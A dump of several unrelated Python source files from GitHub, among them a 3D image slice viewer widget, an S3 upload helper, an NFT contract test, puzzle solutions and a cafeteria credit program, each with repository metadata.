is_debug:\n self.b_clear.on_click(self._clear_output)\n self.b_layout_vertical.layout.border = \"1px solid black\"\n self.b_layout_horizontal.layout.border = \"1px solid black\"\n self.slice_layout.layout.border = \"1px solid black\"\n self.slider_layout.layout.border = \"1px solid black\"\n self.widget_box.layout.border = \"1px solid black\"\n self.load_seg_box.layout.border = \"1px solid black\"\n\n display(self.app) # show app\n\n def _show_axial(self, b):\n \"\"\"Shows X,Y-plane in figure.\n\n Args:\n b (bool): required for on_click callback\n \"\"\"\n\n self.curr_axis = 2 # z = const\n default_slice = int(self.image3D.shape[self.curr_axis] / 2) # default z index\n self.slider.value = default_slice # calls _update2D\n\n xlabel = \"Y\"\n ylabel = \"X\"\n\n self.widget.update_layout(\n xaxis=dict(title_text=xlabel, range=[0, self.image3D.shape[1]]),\n yaxis=dict(title_text=ylabel, range=[self.image3D.shape[0], 0]),\n )\n\n self._debug(\"Show axial.\")\n\n def _show_coronal(self, b):\n \"\"\"Shows X,Z-plane in figure.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n\n self.curr_axis = 1 # y = const\n default_slice = int(self.image3D.shape[self.curr_axis] / 2) # default y index\n self.slider.value = default_slice # calls _update2D\n\n xlabel = \"Z\"\n ylabel = \"X\"\n\n self.widget.update_layout(\n xaxis=dict(title_text=xlabel, range=[0, self.image3D.shape[2]]),\n yaxis=dict(title_text=ylabel, range=[self.image3D.shape[0], 0]),\n )\n\n self._debug(\"Show coronal.\")\n\n def _show_sagittal(self, b):\n \"\"\"Shows Y,Z-plane in figure.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n self.curr_axis = 0 # x = const\n default_slice = int(self.image3D.shape[self.curr_axis] / 2) # default x index\n self.slider.value = default_slice # calls _update2D\n\n xlabel = \"Z\"\n ylabel = \"Y\"\n\n self.widget.update_layout(\n xaxis=dict(title_text=xlabel, range=[0, self.image3D.shape[2]]),\n yaxis=dict(title_text=ylabel, range=[self.image3D.shape[1], 0]),\n )\n\n self._debug(\"Show sagittal.\")\n\n def _axis_changed(self, change):\n \"\"\"Update slider range and labels based on current axis.\n\n Args:\n change (dict): required for on_click callback\n \"\"\"\n max = self.image3D.shape[self.curr_axis] - 1\n self.slider.max = max\n self.max_label.value = \"Max = \" + str(max)\n\n if self.curr_axis == 0:\n self.slider.description = \"X\"\n elif self.curr_axis == 1:\n self.slider.description = \"Y\"\n else:\n self.slider.description = \"Z\"\n\n self._debug(\"Axis changed.\")\n\n def _rotate_view(self, b):\n \"\"\"Rotates the 3D dataset by 90 degrees in the current plane.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n rot_axes = self._get_rot_axes()\n self.image3D = np.rot90(\n self.image3D, axes=rot_axes\n ) # rotated \"view\" on ndarray\n if self.seg3D is not None:\n self.seg3D = np.rot90(self.seg3D, axes=rot_axes)\n self._update2D(None) # index unchanged\n\n def _flip_up(self, b):\n \"\"\"Flips the 3D dataset upside down in the current plane.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n flip_axis = self._get_rot_axes()[0]\n self.image3D = np.flip(self.image3D, axis=flip_axis)\n if self.seg3D is not None:\n self.seg3D = np.flip(self.seg3D, axis=flip_axis)\n self._update2D(None)\n\n def _flip_lr(self, b):\n \"\"\"Flips the 3D dataset left to right in the current plane.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n flip_axis = self._get_rot_axes()[1]\n self.image3D = np.flip(self.image3D, axis=flip_axis)\n if self.seg3D is not None:\n self.seg3D = np.flip(self.seg3D, axis=flip_axis)\n self._update2D(None)\n\n def _slice_changed(self, change):\n \"\"\"Callback that triggers if the slider changed its value.\n\n Args:\n b (dict): the new value is retrieved as b.new\n \"\"\"\n\n self._update2D(change.new)\n\n def _clear_output(self, b):\n \"\"\"Clears the debug output.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n self.out.clear_output()\n\n def _update2D(self, index):\n \"\"\"Method to update 2D view.\n\n Args:\n index (int): the new slice index\n \"\"\"\n if index is None: # index unchanged\n index = self.slider.value\n\n # update image2D and segmentations according to axis and index\n if self.curr_axis == 0:\n self.image2D = self.image3D[index, :, :]\n if self.seg3D is not None:\n self.seg2D = self.seg3D[index, :, :]\n if self.seg3D_validation is not None:\n self.seg2D_validation = self.seg3D_validation[index, :, :]\n elif self.curr_axis == 1:\n self.image2D = self.image3D[:, index, :]\n if self.seg3D is not None:\n self.seg2D = self.seg3D[:, index, :]\n if self.seg3D_validation is not None:\n self.seg2D_validation = self.seg3D_validation[:, index, :]\n else:\n self.image2D = self.image3D[:, :, index]\n if self.seg3D is not None:\n self.seg2D = self.seg3D[:, :, index]\n if self.seg3D_validation is not None:\n self.seg2D_validation = self.seg3D_validation[:, :, index]\n\n # generate segmentations (optional)\n trace_list = []\n\n if self.seg3D_validation is not None: # validation segmentation first\n for c in self.class_names_validation.values():\n if c == 0: # unclassified\n continue\n c_indices = np.nonzero(self.seg2D_validation == c) # tuple of arrays\n class_name = list(self.class_names.keys())[\n list(self.class_names.values()).index(c)\n ]\n color = self.class_colors[class_name]\n if len(self.class_names_validation) == 2: # white if only one class\n color = \"rgb(255,255,255)\"\n class_name = list(self.class_names_validation.keys())[\n list(self.class_names_validation.values()).index(c)\n ]\n trace_list.append(\n go.Scatter(\n y=c_indices[0],\n x=c_indices[1],\n opacity=0.3,\n mode=\"markers\",\n marker_color=color,\n marker_symbol=\"square\",\n showlegend=True,\n name=class_name,\n )\n )\n\n # segmentation \"overlay\"\n if self.seg3D is not None:\n for c in self.class_names.values():\n if c == 0: # unclassified\n continue\n c_indices = np.nonzero(self.seg2D == c) # tuple of arrays\n class_name = list(self.class_names.keys())[\n list(self.class_names.values()).index(c)\n ]\n trace_list.append(\n go.Scatter(\n y=c_indices[0],\n x=c_indices[1],\n opacity=0.5,\n mode=\"markers\",\n marker_symbol=\"square\",\n marker_color=self.class_colors[class_name],\n showlegend=True,\n name=class_name,\n )\n )\n\n # batch update\n with self.widget.batch_update():\n self.widget.data[0][\"z\"] = self.image2D\n self.widget.data = [self.widget.data[0]] # clear segmentations\n self.widget.add_traces(trace_list)\n self.widget.update_layout(\n legend=dict(x=0, y=1, orientation=\"h\", yanchor=\"bottom\", xanchor=\"left\")\n )\n self._debug(\"update.\")\n\n def _up_pressed(self, b):\n \"\"\"Increments slider by one.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n new_value = self.slider.value + 1\n self.slider.value = new_value\n\n def _down_pressed(self, b):\n \"\"\"Decrements slider by one.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n new_value = self.slider.value - 1\n self.slider.value = new_value\n\n def _load_segmentation(self, b, is_validation=False):\n \"\"\"Loads a segmentation file with class names and colors.\n\n Args:\n b (dict): required for on_click callback\n is_validation (bool, optional): Flag for validation segmentation. Defaults to False.\n\n Raises:\n ValueError: If the segmentation shape (dimension) does not match the image.\n FileNotFoundError: If the filename is invalid.\n \"\"\"\n # read filename from text entry field\n file = None\n if is_validation:\n file = self.validation_path.value\n else:\n file = self.segmentation_path.value\n\n if str(file): # not empty\n try:\n seg_image = load_image(file, is_segmentation=True)\n\n if is_validation:\n self.seg3D_validation = seg_image.get_timepoint(0)\n else:\n self.seg3D = seg_image.get_timepoint(0) # 3D\n\n # check shape of segmentation\n if is_validation:\n if (\n self.seg3D_validation.shape != self.image3D.shape\n and self.seg3D.shape != self.image3D.shape\n ):\n raise ValueError(\"Validation segmentation shape mismatch.\")\n else:\n if self.seg3D.shape != self.image3D.shape:\n raise ValueError(\"Segmentation shape mismatch.\")\n\n # rename validation segmentation class names\n if is_validation:\n self.class_names_validation = seg_image.get_class_names()\n tmp = {}\n for i in self.class_names_validation.keys():\n tmp[i + \"_v\"] = self.class_names_validation[i]\n self.class_names_validation = tmp\n self.class_colors = seg_image.get_class_colors()\n else:\n self.class_names = seg_image.get_class_names()\n\n self.class_colors = seg_image.get_class_colors() # \"rgb(a,b,c)\"\n\n self._update2D(index=None) # sets seg2D and paints it\n except FileNotFoundError:\n print(\"Segmentation file name invalid.\")\n except ValueError as valErr:\n print(\"Error: \" + valErr)\n\n def _load_validation_segmentation(self, b):\n \"\"\"Loads a validation segmentation.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n self._load_segmentation(b, True)\n self._compute_dice_score()\n\n def _compute_dice_score(self):\n \"\"\"Computes the Sorensen-Dice similarity coefficient between the segmentation and validation segmentation.\"\"\"\n\n if self.seg3D is not None and self.seg3D_validation is not None:\n for i in self.class_names:\n index = self.class_names[i]\n if index == 0: # unclassified\n continue\n X_i = self.seg3D[self.seg3D == index]\n X = len(X_i) # number of voxels in class i\n Y_i = self.seg3D_validation[self.seg3D_validation == index]\n Y = len(Y_i)\n\n # intersection of segmentation and validation for class i\n intersection = np.sum(\n np.where(\n (self.seg3D == index)\n & (self.seg3D_validation == index)\n & (self.seg3D != 0),\n 1,\n 0,\n )\n )\n Dice = 2 * intersection / (X + Y)\n\n print(\"Dice score for class \" + i + \": \" + str(Dice) + \"\\n\")\n\n def _debug(self, string):\n \"\"\"Prints a string to the debug output (if enabled).\n\n Args:\n string (str): the string to be printed\n \"\"\"\n global is_debug\n if is_debug:\n self.out.append_stdout(string + \"\\n\")\n\n def _get_rot_axes(self):\n \"\"\"Returns the two axes of the current slice.\n\n Returns:\n list: the two axes\n \"\"\"\n if self.curr_axis == 0:\n return [1, 2]\n elif self.curr_axis == 1:\n return [0, 2]\n else:\n return [0, 1]\n\n def _clear_segmentation(self, b):\n \"\"\"Clears the current segmentation.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n if self.seg3D is not None:\n self.seg3D = None\n self.seg2D = None\n self._update2D(None)\n\n def _clear_validation(self, b):\n \"\"\"Clears the current validation segmentation.\n\n Args:\n b (dict): required for on_click callback\n \"\"\"\n if self.seg3D_validation is not None:\n self.seg3D_validation = None\n self.seg2D_validation = None\n self._update2D(None)\n\n # --- public methods --- #\n\n def set_figure_size(self, width, height):\n \"\"\"Set size of figure.\n\n Args:\n width (int): width of figure in pixels\n height (int): height of figure in pixels\n \"\"\"\n self.widget.layout.width = width\n self.widget.layout.height = height\n\n def set_colormap(self, cmap):\n \"\"\"Set the figure's colormap.\n\n Args:\n cmap (str): Name of Plotly colorscale. See https://plotly.com/python/builtin-colorscales/\n \"\"\"\n self.widget.update_coloraxes(\n cmin=np.min(self.image3D),\n cmax=np.max(self.image3D),\n colorscale=cmap,\n title=\"Class\",\n )\n\n self._debug(\n \"cmin=\" + str(np.min(self.image3D)) + \", cmax=\" + str(np.max(self.image3D))\n )\n\n def add_class_names(self, names, indices):\n \"\"\"Sets class indices as colorbar ticks and class names as tick labels.\n\n Args:\n names (list): list of name strings\n indices (list): list of class integer indices\n \"\"\"\n self.widget.update_coloraxes(\n colorbar_tickmode=\"array\",\n colorbar_tickvals=indices,\n colorbar_ticktext=names,\n )\n","repo_name":"nicholasbook/slicevis","sub_path":"slicevis/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":22251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41380819914","text":"import boto3\n\n\ndef upload_to_aws(local_file, bucket, s3_file):\n s3 = boto3.client('s3')\n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(\"Upload Successful\")\n return True\n except FileNotFoundError:\n print(\"The file was not found\")\n return False\n\n\nuploaded = upload_to_aws(\n '../example.parquet', 'convex-bucket1', 'example.parquet'\n)\n","repo_name":"Seraph2000/convex_tech_test","sub_path":".aws/upload_file_to_s3.py","file_name":"upload_file_to_s3.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74118867341","text":"import brownie\nfrom brownie import accounts, config, RevealERC721, network\nfrom scripts.helpers.contracts import get_contract, fund_with_link\n\n\ndef get_tokens_ids(ct):\n totalSupply = ct.totalSupply()\n return [int(ct.tokenURI(token_id+1).split(\"/\")[-1].split(\".json\")[0]) for token_id in range(totalSupply)]\n\n\ndef get_tokens_uri(ct):\n totalSupply = ct.totalSupply()\n return [ct.tokenURI(token_id+1) for token_id in range(totalSupply)]\n\n\ndef test_normal_workflow():\n account0 = accounts.add(config[\"wallets\"][\"from_key\"])\n collectionName: str = \"Collection\"\n baseURI: str = \"ipfs://12345/\"\n vrfCoordinator = get_contract(\"VRFCoordinator\", account0)\n link = get_contract(\"LinkToken\", account0)\n linkFee = config[\"networks\"][network.show_active()][\"fee\"]\n linkKeyhash = config[\"networks\"][network.show_active()][\"keyhash\"]\n\n ct = RevealERC721.deploy(\n collectionName, baseURI, vrfCoordinator.address, link.address, linkFee, linkKeyhash,\n {\"from\": account0},\n publish_source=False\n )\n\n # Initial values\n assert ct.name() == collectionName\n assert ct.balance() == 0\n assert ct.balanceOf(account0.address) == 0\n assert ct.paused() is False\n assert ct.owner() == account0.address\n assert ct.totalSupply() == 0\n assert ct.contractState() == 0\n\n with brownie.reverts(\"ERC721Metadata: URI query for nonexistent token\"):\n ct.tokenURI(1)\n\n # Owner Minting\n amount = 50\n ct.mint(account0.address, amount, {\"from\": account0})\n assert ct.totalSupply() == amount\n assert ct.balanceOf(account0.address) == amount\n ids = get_tokens_ids(ct)\n assert ids == list(range(1,51))\n\n # Not owner minting\n with brownie.reverts(\"Ownable: caller is not the owner\"):\n ct.mint(accounts[1].address, 1, {\"from\": accounts[1]})\n\n # No reveal URIs\n uris = get_tokens_uri(ct)\n assert [baseURI+\"noreveal/\"+str(id)+\".json\" for id in ids] == uris\n\n # Not owner reveal\n with brownie.reverts(\"Ownable: caller is not the owner\"):\n ct.revealTokens({\"from\": accounts[1]})\n\n # Reveal before random number\n with brownie.reverts(\"Wrong contract state\"):\n ct.revealTokens({\"from\": account0})\n\n # Get random number without enough LINK\n with brownie.reverts(\"Not enough LINK\"):\n ct.getRandomNumber({\"from\": account0})\n\n # Found the contract and get the random number\n tx = fund_with_link(ct.address, account0, link, linkFee)\n tx.wait(1)\n tx = ct.getRandomNumber({\"from\": account0})\n tx.wait(1)\n assert ct.contractState() == 2\n\n # Run the vrfCoordinator mock, only for local tests\n request_id = tx.events[\"RequestedRandomness\"][\"requestID\"]\n rand = 57960407935404775673433170853203864526063280851215043454225382818284790976260\n tx = vrfCoordinator.callBackWithRandomness(request_id, rand, ct.address, {\"from\": account0})\n assert ct.randomResult() != 0\n\n # Reveal the tokens\n ct.revealTokens({\"from\": account0})\n assert ct.balanceOf(account0.address) == amount\n \n # Try to reveal twice\n with brownie.reverts(\"Wrong contract state\"):\n ct.revealTokens({\"from\": account0})\n\n # We don't allow minting after reveal\n with brownie.reverts(\"Tokens can only be minted before reveal\"):\n ct.mint(account0.address, 1, {\"from\": account0})\n\n # Check shuffled ids\n idsShuffled = get_tokens_ids(ct)\n assert idsShuffled != ids\n assert sorted(idsShuffled) == sorted(ids)\n\n # Check reveal uris\n uris = get_tokens_uri(ct)\n assert [baseURI+\"reveal/\"+str(id)+\".json\" for id in idsShuffled] == uris\n\n # Check nft transfer\n ct.transferFrom(account0.address, accounts[1].address, 1, {'from': account0})\n ct.transferFrom(accounts[1].address, accounts[2].address, 1, {'from': accounts[1]})\n ct.transferFrom(account0.address, accounts[2].address, 2, {'from': account0})\n assert ct.balanceOf(account0.address) == amount-2\n assert ct.balanceOf(accounts[1].address) == 0\n assert ct.balanceOf(accounts[2].address) == 2\n\n # Try to transfer a token that the account is not the owner\n with brownie.reverts(\"ERC721: transfer caller is not owner nor approved\"):\n ct.transferFrom(accounts[1].address, accounts[2].address, 1, {'from': accounts[1]})\n\n # Contract owner try to transfer a token from another owner\n with brownie.reverts(\"ERC721: transfer caller is not owner nor approved\"):\n ct.transferFrom(accounts[2].address, accounts[3].address, 1, {'from': account0})\n\n # Allow an account to transfer tokens\n approved = ct.isApprovedForAll(accounts[2].address, account0.address)\n assert approved == False\n ct.setApprovalForAll(account0.address, True, {'from': accounts[2]})\n approved = ct.isApprovedForAll(accounts[2].address, account0.address)\n assert approved == True\n ct.transferFrom(accounts[2].address, accounts[4].address, 1, {'from': account0})\n\n # Test revoke permission\n ct.setApprovalForAll(account0.address, False, {'from': accounts[2]})\n with brownie.reverts(\"ERC721: transfer caller is not owner nor approved\"):\n ct.transferFrom(accounts[2].address, accounts[4].address, 2, {'from': account0})\n\n # Test interfaces\n supported_interface_ids = {\n \"ERC721\": 0x80ac58cd, # Non-Fungible Token Standard\n \"ERC721Metadata\": 0x5b5e139f, # Non-Fungible Token Standard, optional metadata extension\n \"IERC2981\": 0x2a55205a, # NFT Royalty Standard\n \"EIP165\": 0x01ffc9a7, # Standard Interface Detection\n }\n for interface, id in supported_interface_ids.items():\n assert ct.supportsInterface(id) == True, \"supportsInterface: \"+interface\n\n # Test royalt\n sale_price = 100000\n assert ct.royaltyInfo(1, sale_price) == (account0.address, sale_price*0)\n with brownie.reverts(\"Ownable: caller is not the owner\"):\n ct.setRoyalty(200, {\"from\": accounts[1]})\n ct.setRoyalty(200, {'from': account0})\n assert ct.royaltyInfo(1, sale_price) == (account0.address, sale_price*0.02)","repo_name":"filipecaixeta/reveal-erc721","sub_path":"tests/test_contract.py","file_name":"test_contract.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42673206203","text":"import setuptools\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\nsetuptools.setup(\n name='playwithML',\n version='0.2',\n scripts=['playwithml.py'],\n author=\"Akash C\",\n author_email=\"akashincrp@gmail.com\",\n description=\"A AutoML type utility\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mystery2828/playwithml\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n )","repo_name":"mystery2828/playwithML","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"47"} +{"seq_id":"73117749582","text":"import re\nimport itertools\nimport numpy as np\nimport time\n\ninstructions = open(\"2016/day11.txt\").read().splitlines()\n\nclass Floor():\n def __init__(self, floor_number, microchips = [], generators = []):\n self.floor_number = floor_number\n self.microchips = microchips\n self.generators = generators\n \n def load(self, thing):\n if type(thing) == Microchip:\n self.microchips.append(thing)\n if type(thing) == Generator:\n self.generators.append(thing)\n \n def unload(self, thing):\n if type(thing) == Microchip:\n self.microchips.remove(thing)\n if type(thing) == Generator:\n self.generators.remove(thing)\n \n def amount(self):\n return len(self.microchips) + len(self.generators)\n \n def danger_check(self):\n temp_chips = self.microchips.copy()\n temp_gens = self.generators.copy()\n okay_items = []\n for chip in temp_chips:\n for gen in temp_gens:\n if chip.get_element() == gen.get_element(): #If there is a matching pair, remove it\n print(f\"Pair! {chip} {gen}\")\n okay_items.append(chip)\n okay_items.append(gen)\n for item in okay_items:\n if type(item) == Generator:\n temp_gens.remove(item)\n else:\n temp_chips.remove(item)\n if len(temp_chips) >= 1 and len(temp_gens) >= 1:\n return True\n return False\n\nclass Elevator():\n def __init__(self, contents=[], floor=1):\n self.contents = contents\n self.floor = floor\n \n def load(self, thing):\n floors_list[self.floor - 1].unload(thing)\n self.contents.append(thing)\n \n def unload(self, thing):\n floors_list[self.floor - 1].load(thing)\n self.contents.remove(thing)\n \n def danger_check(self): #Returns True if the items in the elevator interfere with eachother, False if there is no danger\n generator_list = []\n microchip_list = []\n for item in self.contents:\n if type(item) == Generator:\n generator_list += item\n elif type(item) == Microchip:\n microchip_list += item\n \n #If there is just one microchip and just one generator, they must be the same element\n #otherwise, two microchips and two generators are just fine\n if len(generator_list) == 1 and len(microchip_list) == 1:\n if generator_list[0].get_element() != microchip_list[0].get_element():\n print(\"Danger! Elevator contains competing items\")\n return True\n return False\n \n def move_floor(self, up_or_down):\n if self.contents == []:\n print(\"elevator can't move! Needs something inside\")\n elif len(self.contents) > 2:\n print(\"too many items in elevator!\")\n if self.danger_check():\n print(\"can't move floors! Danger in elevator!\")\n\n elif up_or_down == \"up\":\n self.floor += 1\n elif up_or_down == \"down\":\n self.floor -= 1\n\nclass Generator():\n def __init__(self, element):\n self.element = element\n \n def __repr__(self):\n return self.element + \" \" + type(self).__name__\n \n def get_element(self):\n return self.element\n\nclass Microchip(Generator):\n pass\n\nh_gen = Generator(\"Hydrogen\")\nh_mic = Microchip(\"Hydrogen\")\nl_gen = Generator(\"Lithium\")\nl_mic = Microchip(\"Lithium\")\n\nfloors_list = [Floor(1, microchips=[h_mic, l_mic]),Floor(2, generators=[h_gen]),Floor(3, generators=[l_gen]),Floor(4)]\n\n#floor5 = Floor(5, generators=[Generator(\"A\"), Generator(\"C\"), Generator(\"B\")], microchips=[Microchip(\"B\"), Microchip(\"A\"), Microchip(\"D\")])\n#print(floor5.danger_check())\n\nelevator = Elevator()\n\nstep_count = 0\n#while floors_list[3].amount() != 4: (while floor four doesn't have every item) \nfor i in range(5):\n current_floor_num = elevator.floor\n floor = floors_list[current_floor_num - 1]\n if len(elevator.contents) < 2: \n #for every chip, if it's generator is on another floor\n for chip in floor.microchips:\n for other_floor in floors_list:\n if other_floor.floor_number > floor.floor_number and chip.element in [gen.element for gen in other_floor.generators] and len(elevator.contents) < 2:\n print(f\"floor {other_floor.floor_number} has the generator to {chip}\")\n elevator.load(chip)\n for gen in floor.generators:\n for other_floor in floors_list:\n if other_floor.floor_number > floor.floor_number and gen.element in [chip.element for chip in other_floor.microchips] and len(elevator.contents) < 2:\n #print(f\"floor {other_floor.floor_number} has the microchip to {gen}\")\n elevator.load(gen)\n\n\n\n#RULES\n#Generator and Microchip of two different elements cant be on same floor (or elevator ride) unless microchip is attached to it's generator\n#Elevator can only carry two items, must carry at least one to move\n#get everything to floor four\n\n#While all generators and microchips arent on floor one\n #If nothing is in the elevator\n #pick up to two items (have to figure out logic here)\n #check danger, if ok continue, if not choose two different items\n #maybe check if the items can go up or down a level and be safe as well?\n #if something is in elevator\n #determine whether it needs to go up or down\n #bring the item up or down\n #unload the items (if it is safe to do so)\n","repo_name":"EnderFlop/advent_of_code","sub_path":"2016/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32479260298","text":"import unittest\nimport L0028_Implement_strStr as leet\n\nclass L0028_Implement_strStrTest(unittest.TestCase):\n def test_1(self):\n _s = leet.Solution()\n haystack = \"hello\"\n needle = \"ll\"\n expect = 2\n actual = _s.strStr(haystack,needle)\n self.assertEqual(expect, actual)\n\n def test_2(self):\n _s = leet.Solution()\n haystack = \"aaaaa\"\n needle = \"bba\"\n expect = -1\n actual = _s.strStr(haystack,needle)\n self.assertEqual(expect, actual)\n\n def test_3(self):\n _s = leet.Solution()\n haystack = \"mississippi\"\n needle = \"issip\"\n expect = 4\n actual = _s.strStr(haystack, needle)\n self.assertEqual(expect, actual)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"waking999/machine_learning","sub_path":"LeetCode/easy/L0028_Implement_strStr/L0028_Implement_strStrTest.py","file_name":"L0028_Implement_strStrTest.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9093549138","text":"def load_data(filename):\n with open(filename) as f:\n data = f.readline()\n data = data.strip()\n data = data.split(',')\n data = [int(x) for x in data]\n return data\n\n\ndef genearte_fishes(data, days=256):\n print('Initial state: ', data)\n yung_fishes_index = []\n for i in range(days):\n for fish in range(len(data)):\n if data[fish] == 0:\n data[fish] = 6\n data.append(8)\n else:\n # print(f'yes {data[fish]=}')\n data[fish] -= 1\n # print('After', i + 1, ' day:', data)\n return data\n\n\n# filename = 'test-input.txt'\nfilename = 'input.txt'\n\ndata = load_data(filename)\ndata2 = genearte_fishes(data)\nprint(len(data2))\n","repo_name":"lapssh/advent_of_code","sub_path":"2021/day06/06-lanternfish.py","file_name":"06-lanternfish.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15059140692","text":"# -*- coding: utf-8 -*-\nimport random\nimport math\n\nclass Person:\n\n def __init__(self, registration, type, cash):\n self.registration = registration\n self.type = type\n self.cash = cash\n\n def has_cash(self, price):\n return self.cash - price >= 0\n\n def meal_price(self):\n\n meal_prices = {\n 'Employee': 13.00,\n 'Student': 5.20,\n }\n\n return meal_prices[self.type]\n\n def breakfast_price(self):\n\n breakfast_prices = {\n 'Employee': 13.00,\n 'Student': 5.20,\n }\n\n return breakfast_prices[self.type]\n\n def discount_meal_price(self):\n\n if self.has_cash(self.meal_price()):\n self.cash -= self.meal_price()\n\n else:\n print(\"\\nDINHEIRO INSUFICIENTE!!! OPERAÇÃO CANCELADA\\n\")\n\n def discount_breakfast_price(self):\n\n if self.has_cash(self.breakfast_price()):\n self.cash -= self.breakfast_price()\n\n else:\n print(\"\\nDINHEIRO INSUFICIENTE!!! OPERAÇÃO CANCELADA\\n\")\n\n def insert_cash(self, cash):\n self.cash += cash\n\n\n\ndef generate_people():\n\n people = []\n\n for i in range(5000):\n registration = random.randint(100000001, 180000001)\n cash = random.randint(1, 100)\n types = ['Employee', 'Student']\n type = random.choice(types)\n people.append(Person(registration, type, cash))\n\n return people\n\n\ndef insertionSort(people):\n for index in range(1,len(people)):\n\n current_person = people[index]\n current_registration = people[index].registration\n position = index\n\n while position > 0 and people[position-1].registration > current_registration:\n people[position] = people[position-1]\n position = position-1\n\n people[position] = current_person\n\n\ndef remove_duplicates(people):\n seen = set()\n seen_add = seen.add\n return [x for x in people if not (x.registration in seen or seen_add(x.registration))]\n\n\ndef write_to_file(people):\n file = open(\"matriculas.txt\",\"w\")\n for p in people:\n file.write(str(p.registration) + \" \" + p.type + \" \" + str(p.cash) + \"\\n\")\n file.close()\n\n\ndef search(registration, people_list):\n\n lower_index = 0\n upper_index = people_list.__len__() - 1\n\n while lower_index <= upper_index:\n\n middle_index = math.floor((upper_index + lower_index) / 2)\n\n current_person = people_list[middle_index]\n\n if current_person.registration == registration:\n return current_person\n\n elif current_person.registration > registration:\n upper_index = middle_index - 1\n\n else:\n lower_index = middle_index + 1\n\n return None\n\n\n##################################################################\n\npeople = generate_people() # generates random students and employess\n#people.sort(key=lambda p: p.registration, reverse=False)\ninsertionSort(people) #ordenate by registration\npeople = remove_duplicates(people) # remove people with the same registrarion\nwrite_to_file(people) # writes the people data to matriculas.txt\n\nwhile True:\n registration = int(input(\"Digite a matricula do estudante/funcionário: \"))\n person = search(registration, people) #binary search by registration\n\n if person is not None:\n\n print(\"\\nMatrícula encontrada! Tipo: \" + person.type + \"\\n\")\n\n while True:\n\n option = int(input(\"\\nO que deseja fazer?\\n(1)Ver saldo\\n(2)Inserir créditos\\n(3)Descontar café da manhã\\n(4)Descontar almoço/jantar\\n(5)Sair do registro de \" + str(person.registration) + \"\\n\"))\n\n if option == 1:\n print(\"\\nSaldo atual: \" + str(person.cash))\n\n elif option == 2:\n cash = float(input(\"Digite o valor a ser inserido: \"))\n\n print(\"\\nSaldo anterior: \" + str(person.cash))\n person.insert_cash(cash)\n\n print(\"\\nSaldo atual: \" + str(person.cash))\n write_to_file(people)\n\n elif option == 3:\n\n print(\"\\nSaldo anterior: \" + str(person.cash))\n person.discount_breakfast_price()\n\n print(\"\\nSaldo atual: \" + str(person.cash))\n write_to_file(people)\n\n elif option == 4:\n\n print(\"\\nSaldo anterior: \" + str(person.cash))\n person.discount_meal_price()\n\n print(\"\\nSaldo atual: \" + str(person.cash))\n write_to_file(people)\n\n elif option == 5:\n break\n\n else:\n print(\"Opção inexistente! Tente novamente\")\n\n else:\n print(\"Matrícula não encontrada!\")\n\n\n option = input(\"Deseja fazer uma nova busca (s)/(n)?\")\n\n if option == \"n\":\n break\n","repo_name":"EDAII/Lista1e2--BuscaEOrdenacao","sub_path":"lista1_2_busca_ordenacao.py","file_name":"lista1_2_busca_ordenacao.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71913647548","text":"import numpy as np\nimport networkx as nx\nimport f_info\nfrom itertools import combinations\nfrom f_info import*\n\ndef create_params(Na, dim_a, max_iter, upb, lwb):\n # creat matrix Q and r\n A = np.zeros((dim_a, Na))\n for i in range(Na):\n random_colum = np.random.randint(1, 5, dim_a)\n A[:,i] = random_colum\n \n random_matrix = np.random.randint(1, 6, size=(dim_a,dim_a))\n Q = np.zeros((dim_a, Na*dim_a))\n S,_ = np.linalg.qr(random_matrix)\n for i in range(Na):\n Q_i = S.T@np.diag(A[:,i])@S # Q_i & Q have different address\n Q[:, i*dim_a:(i+1)*dim_a] = Q_i\n \n\n r = np.random.normal(0, 1, size=(1,Na))\n\n # set initial value\n initial_tem = np.zeros((dim_a, Na))\n for i in range(Na):\n current_upb = upb[:, i]\n current_lwb = lwb[:, i]\n for j in range(dim_a):\n initial_tem[j, i] = np.random.randint(current_lwb, current_upb, 1)\n\n initial_sum = np.sum(initial_tem, 1)\n agent_initial = 1/Na*initial_sum\n y_initial = agent_initial # same address\n\n # calculate initial g and f\n x = np.zeros((Na*dim_a, Na*max_iter))\n g = np.zeros((Na*dim_a, Na*max_iter))\n f = np.zeros((Na, Na*max_iter))\n Q_sum = np.zeros((dim_a, dim_a))\n for i in range(Na):\n x[i*dim_a:(i+1)*dim_a, i*max_iter] = agent_initial\n Q_current = Q[:, i*dim_a:(i+1)*dim_a]\n Q_sum = Q_sum + Q_current\n 